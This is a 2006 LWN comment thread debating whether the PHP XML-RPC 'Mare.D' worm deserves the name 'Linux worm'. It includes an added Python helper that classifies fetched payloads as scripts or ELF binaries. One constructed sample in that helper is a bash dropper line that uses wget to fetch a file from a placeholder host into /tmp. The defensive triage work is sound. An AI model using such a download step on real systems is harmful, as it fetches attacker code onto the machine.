
A new Linux worm

A new Linux worm

Posted Feb 21, 2006 18:33 UTC (Tue) by xtifr (subscriber, #143)
Parent article: A new Linux worm

Is this actually a "Linux worm"? Or is it merely a worm that affects any system running old versions of PHP XML-RPC and a vulnerable CMS? Wouldn't Windows/AIX/BSD/Solaris/etc. systems be equally affected? The linked reports didn't really make this clear (at least to me).



A new Linux worm

Posted Feb 21, 2006 19:05 UTC (Tue) by smoogen (subscriber, #97)

The shell script is Bash and the executable it downloads is Linux only... so in this case if you are running Apache on Windows.. you are home clear.

From what I can tell this variant has been around since Feb 14th. The infected bot boxes do a scan for various vulnerabilities.. and then download the worm onto the box. It then executes the worm and listens for commands from the boss-bot.

As always.. your OS is only as good as you can AND will patch it :)

A new Linux worm

Posted Feb 22, 2006 1:40 UTC (Wed) by cventers (subscriber, #31465)

I wish these malware authors would learn to write portable code so that we can stop calling PHP security problems "Linux" problems...

:)

A new Linux worm

Posted Feb 22, 2006 9:46 UTC (Wed) by hawk (subscriber, #3195)

Well, sounds like you're equally exploitable, just that this particular worm isn't compatible with your system.

A new Linux worm

Posted Feb 22, 2006 11:13 UTC (Wed) by nix (subscriber, #2304)

Oh good, another exploit killed by digsig.

A new Linux worm

Posted Feb 23, 2006 8:58 UTC (Thu) by emj (guest, #14307)

Digsig is a Linux kernel module, which checks RSA digital signatures of ELF binaries and libraries before they are run.

But if this had been done with just bash scripts, digsig wouldn't be of much help, right?

A new Linux worm

Posted Feb 23, 2006 9:44 UTC (Thu) by nix (subscriber, #2304)

The webpage is out of date: as of the CVS release (stable as hell despite not being released yet), scripts can be checked too, but it's more annoying (you have to decorate every script you'll run).

A new Linux worm

Posted Feb 22, 2006 9:43 UTC (Wed) by nhippi (subscriber, #34640)

PHP worm might be a more appropriate term. However, in this case the popular media (as usual) is using "Linux" as a synonym for "Open Source systems". Considering the extreme popularity of PHP, it is quite surprising that there seems to be very little effort to actually make it secure.

The "PHP is the weak link of LAMP security" aspect is amplified by the fact that most PHP applications are not installed with package management (apt/yum), and thus do not get security updates via the normal process.

A new Linux worm

Posted Feb 22, 2006 20:47 UTC (Wed) by NightMonkey (subscriber, #23051)

One of the many reasons I like Gentoo's Portage - web apps are (almost) first-class citizens there. webapp-config, while taking a bit to get used to, allows easy updating of web apps, with similar protection and managed updating of configuration files as in any other application. And it handles virtual hosts!

A new Linux worm

Posted Feb 23, 2006 9:10 UTC (Thu) by tzafrir (subscriber, #11501)

It is also in Debian and was also true for Mandrake last time I looked over three years ago.

However package managers don't interact well with SQL. And furthermore many of those programs are horribly packaged and are a pain to package correctly: no separation between the basic schema and data and the extra data the user adds.

For instance, have you seen any such sql app where the web app does not have full control over the database?

A new Linux worm

Posted Feb 23, 2006 7:41 UTC (Thu) by job (subscriber, #670)

I get why the popular media has some interest in making Linux look bad (as it understandably provides less advertising revenue), but I think LWN could have had PHP in the headline instead. It's not a scandal magazine :).

A new Linux worm

Posted Feb 23, 2006 18:58 UTC (Thu) by cventers (subscriber, #31465)

Agreed. It's kind of like Stallman's gripe with the "Intellectual Property" propaganda term... using language that confuses the issue clearly destroys the ability to think clearly.

A new Linux worm

Posted Feb 24, 2006 1:56 UTC (Fri) by roelofs (subscriber, #2599)

I get why the popular media has some interest in making Linux look bad (as it understandably provides less advertising revenue), but I think LWN could have had PHP in the headline instead. It's not a scandal magazine :).

It's also not prone to misleading/inaccurate titles. Did you overlook smoogen's upstream comment? The article clearly states that one of the binaries is what does the "worm" part (i.e., propagation), and his comment identifies said binaries as Linux ones.

If that's not the exact definition of "Linux worm," I don't know what is.

Greg

A new Linux worm

Posted Feb 26, 2006 14:06 UTC (Sun) by job (subscriber, #670)

If it had been a virus I might agree, but this is different. You don't call a Skype worm a "Windows worm" just because it is platform specific. Just like "the sendmail worm" was exactly that.

A new Linux worm

Posted Apr 25, 2006 5:41 UTC (Tue) by rickmoen (subscriber, #6943)

roelofs wrote:

It's also not prone to misleading/inaccurate titles. Did you overlook smoogen's upstream comment? The article clearly states that one of the binaries is what does the "worm" part (i.e., propagation), and his comment identifies said binaries as Linux ones. If that's not the exact definition of "Linux worm," I don't know what is.

Greg, the payload of the "Mare.D" worm (which is really just yet another retread of last year's Lupper/ Plupii/Plupii worm) is only incidentally a Linux x86 ELF binary: Without significant change (and, in most cases without change at all), it could be recompiled for Solaris, *BSD, HP/UX, Mac OS X, Win32, etc.

Calling "Mare" (and Lupper) a "Linux worm" suggests that people running with the exact same, identically exploitable PHPXMLRPC vulnerability on other OS platforms need not pay attention. Does that sound reasonable? And would the exact same exploit code, identical except with the payload compiled for Win32, be fairly regarded as a different "worm"?

In a sense, all of this is actually missing the main point: The real problem isn't "worms", which, after all, are merely automated attack tools against known-exploitable vulnerabilities. The real problem is the underlying vulnerabilities. Any sysadmin who's still running known-remotely-exploitable server-app code by the time the "worms" come out -- inevitably months to years later -- is criminally negligent.

Flaws in user applications that handle public content (Web browsers, MUAs, PDF readers, AV players) concern me a great deal more, frankly. They're more likely to be exposed to danger by completely unwary, security-ignorant people -- as opposed to Web site sysadmins.

Rick Moen
rick@linuxmafia.com
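As an added example (not code from this thread, from LWN, or from the worm itself): smoogen's post describes the infection chain as a Bash script that fetches a Linux-only executable, and rickmoen's reply argues that the payload is "only incidentally" a Linux x86 ELF binary. The Python below is the kind of triage helper an incident responder uses on a fetched payload: it tells a shebang script from an ELF binary and decodes the ELF identification bytes (class, byte order, OS ABI, object type, machine). The sample inputs are constructed byte strings, not real samples; the lookup tables hold only a few common values from the ELF specification; and the function and sample names are this example's own. One fact it illustrates: Linux toolchains commonly emit EI_OSABI 0 (generic System V), so the header alone identifies the CPU and ABI, not "Linux", which is the distinction rickmoen draws.

```python
import struct

ELF_MAGIC = b"\x7fELF"

# Partial lookup tables for the header fields that matter during triage.
# Values come from the ELF specification; only common entries are listed.
OSABI = {0: "SYSV", 3: "GNU/Linux", 6: "Solaris", 9: "FreeBSD", 12: "OpenBSD"}
E_TYPE = {1: "relocatable", 2: "executable", 3: "shared object", 4: "core"}
E_MACHINE = {3: "i386", 8: "MIPS", 20: "PowerPC", 40: "ARM", 62: "x86-64"}


def classify(blob: bytes) -> dict:
    """Classify the leading bytes of a fetched payload.

    Returns {"kind": "script", "interpreter": ...} for a shebang script,
    {"kind": "elf", ...} with fields decoded from the ELF header, or
    {"kind": "unknown"} for anything else.
    """
    if blob.startswith(b"#!"):
        # The shebang line names the interpreter that will run the file.
        interp = blob.split(b"\n", 1)[0][2:].strip().decode("ascii", "replace")
        return {"kind": "script", "interpreter": interp}
    if len(blob) < 20 or not blob.startswith(ELF_MAGIC):
        return {"kind": "unknown"}
    ei_class, ei_data, ei_osabi = blob[4], blob[5], blob[7]
    endian = "<" if ei_data == 1 else ">"
    # e_ident is 16 bytes in both ELF32 and ELF64; e_type and e_machine follow it
    # and are stored in the byte order that EI_DATA declares.
    e_type, e_machine = struct.unpack(endian + "HH", blob[16:20])
    return {
        "kind": "elf",
        "bits": 64 if ei_class == 2 else 32,
        "endian": "big" if ei_data == 2 else "little",
        "osabi": OSABI.get(ei_osabi, f"osabi {ei_osabi}"),
        "type": E_TYPE.get(e_type, f"type {e_type}"),
        "machine": E_MACHINE.get(e_machine, f"machine {e_machine}"),
    }


def summarize(blob: bytes) -> str:
    """One-line description, similar in spirit to what file(1) prints."""
    info = classify(blob)
    if info["kind"] == "script":
        return f"script for {info['interpreter']}"
    if info["kind"] == "elf":
        return (f"ELF {info['bits']}-bit {info['endian']}-endian "
                f"{info['type']}, {info['machine']}, {info['osabi']} ABI")
    return "unknown format"


def make_elf_header(ei_class: int, ei_osabi: int, e_type: int, e_machine: int,
                    little_endian: bool = True) -> bytes:
    """Build the first 20 bytes of an ELF header for the constructed samples."""
    ident = (ELF_MAGIC
             + bytes([ei_class, 1 if little_endian else 2, 1, ei_osabi])
             + b"\x00" * 8)
    order = "<" if little_endian else ">"
    return ident + struct.pack(order + "HH", e_type, e_machine)


# Constructed samples (not real malware): a bash dropper, a Linux-built i386
# executable (OSABI 0, as most Linux toolchains emit), a FreeBSD x86-64 one,
# and something that is neither.
SAMPLES = {
    "dropper.sh": b"#!/bin/bash\nwget -q http://example.invalid/x -O /tmp/x\n",
    "payload-linux": make_elf_header(1, 0, 2, 3),
    "payload-freebsd": make_elf_header(2, 9, 2, 62),
    "not-elf": b"MZ\x90\x00",
}

if __name__ == "__main__":
    for name, blob in SAMPLES.items():
        print(f"{name}: {summarize(blob)}")
```

Reading twenty bytes settles what the dropper fetched and for which CPU and ABI it was built; it does not prove the binary will run anywhere in particular, since that also depends on the program interpreter and the system calls it makes. For the "is it a Linux worm" argument, though, the header is the relevant evidence: a Linux-built payload usually announces itself as a generic System V x86 executable, not as Linux.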

A new Linux worm

Posted Mar 6, 2006 12:27 UTC (Mon) by watkin5 (guest, #36313)

Should it not be called a GNU/Linux worm?

Copyright © 2012, Eklektix, Inc.
Comments and public postings are copyrighted by their creators.
Linux is a registered trademark of Linus Torvalds